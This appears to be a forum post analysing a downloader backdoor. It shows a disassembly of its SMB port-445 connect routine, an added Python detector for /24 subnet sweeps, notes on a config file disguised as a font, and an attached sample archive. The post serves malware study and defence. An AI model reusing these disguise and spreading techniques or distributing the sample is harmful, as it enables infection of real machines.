00401BC4 |> 6A 06 push 0x6 ; /Protocol = IPPROTO_TCP
00401BC6 |. 6A 01 push 0x1 ; |Type = SOCK_STREAM
00401BC8 |. 6A 02 push 0x2 ; |Family = AF_INET
00401BCA |. E8 EB080000 call <jmp.&WS2_32.#23> ; \socket
00401BCF |. 8BF0 mov esi,eax
00401BD1 |. 83FE FF cmp esi,-0x1
00401BD4 |. 75 10 jnz Xwuauclt.00401BE6
00401BD6 |. 50 push eax ; /Socket
00401BD7 |. E8 D8080000 call <jmp.&WS2_32.#3> ; \closesocket
00401BDC |. 32C0 xor al,al
00401BDE |. 5E pop esi
00401BDF |. 81C4 A0010000 add esp,0x1A0
00401BE5 |. C3 retn
00401BE6 |> 8B8C24 A80100>mov ecx,dword ptr ss:[esp+0x1A8]
00401BED |. 66:C74424 04 >mov word ptr ss:[esp+0x4],0x2
00401BF4 |. 51 push ecx ; /pAddr
00401BF5 |. E8 B4080000 call <jmp.&WS2_32.#11> ; \inet_addr
00401BFA |. 68 BD010000 push 0x1BD ; /NetShort = 1BD
00401BFF |. 894424 0C mov dword ptr ss:[esp+0xC],eax ; |
00401C03 |. E8 A0080000 call <jmp.&WS2_32.#9> ; \ntohs
00401C08 |. 8D5424 04 lea edx,dword ptr ss:[esp+0x4]
00401C0C |. 6A 10 push 0x10 ; /AddrLen = 10 (16.)
00401C0E |. 52 push edx ; |pSockAddr
00401C0F |. 56 push esi ; |Socket
00401C10 |. 66:894424 12 mov word ptr ss:[esp+0x12],ax ; |
00401C15 |. E8 88080000 call <jmp.&WS2_32.#4> ; \connect
00401C1A |. 85C0 test eax,eax ; connect returns 0 on success
00401C1C |. 0F94C0 sete al ; al is 0 on success
00401C1F |. 5E pop esi
00401C20 |. 81C4 A0010000 add esp,0x1A0
00401C26 \. C3 retn
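The loop above tries a TCP connect to every host of the local /24 on the port pushed as 0x1BD, i.e. 445 (SMB). As an added defensive example, not code from the original post, the Python below looks for exactly that pattern in constructed connection records: one source making attempts on a single port against many hosts of one /24, and whether those hosts form a consecutive run the way a for-loop over the last octet produces.

```python
import ipaddress
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed connection records (src, dst, dport, result), not real telemetry.
# They imitate the loop above: one infected host (.37) sweeping its own /24 on 445.
SAMPLE_CONNECTIONS = [("192.168.160.37", "192.168.160.%d" % i, 445, "refused")
                      for i in range(0, 40)]
SAMPLE_CONNECTIONS += [
    ("192.168.160.37", "192.168.160.40", 445, "ok"),   # one host answered
    ("192.168.160.12", "192.168.160.1", 445, "ok"),    # normal file-share traffic
    ("192.168.160.12", "192.168.160.1", 445, "ok"),
    ("192.168.160.37", "10.1.1.5", 80, "ok"),          # unrelated web traffic
]

def find_subnet_sweeps(records: List[Tuple[str, str, int, str]],
                       min_hosts: int = 16) -> Dict[Tuple[str, str, int], List[str]]:
    """Group attempts by (source, destination /24, port) and return the groups in
    which the source touched at least min_hosts distinct destinations.
    Key: (src, network, port); value: the hosts hit, sorted by address."""
    touched: Dict[Tuple[str, str, int], set] = defaultdict(set)
    for src, dst, dport, _result in records:
        net = ipaddress.ip_network(dst + "/24", strict=False)
        touched[(src, str(net), dport)].add(dst)
    return {key: sorted(hosts, key=ipaddress.ip_address)
            for key, hosts in touched.items() if len(hosts) >= min_hosts}

def is_sequential(hosts: List[str]) -> bool:
    """True when an address-sorted host list is a run of consecutive addresses,
    the signature of a loop over the last octet rather than scattered activity."""
    addrs = [int(ipaddress.ip_address(h)) for h in hosts]
    return all(b - a == 1 for a, b in zip(addrs, addrs[1:]))

if __name__ == "__main__":
    for (src, net, port), hosts in find_subnet_sweeps(SAMPLE_CONNECTIONS).items():
        kind = "sequential" if is_sequential(hosts) else "scattered"
        print("%s swept %d hosts in %s on tcp/%d (%s)" % (src, len(hosts), net, port, kind))
```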
A brief summary: the file C:\WINDOWS\Fonts\gern.fon is really an XX.INI file whose contents are read with GetPrivateProfileStringA. The file holds various URL download links and various strings used for comparisons. explorer.exe is the backdoor program. The remote overflow is a fairly old exploit.
PS: a downloader backdoor, fairly simple. What matters is working the flow out clearly, so that you do not get lost among the APIs. Suitable for new hands who want to analyze malware; it is basically all API calls. I analyzed this a while ago, happened to see it today, and am sharing it. Many of its functions really could not be carried out, which made the analysis rather painful. If you are more capable, try playing with something stronger.
Posting images is a hassle, so I put them in the document. When will DZ let you paste images directly? T_T~~ See the idb and the document for details.
Attachment:
Backdoor.rar
(1.81 MB, downloads: 64)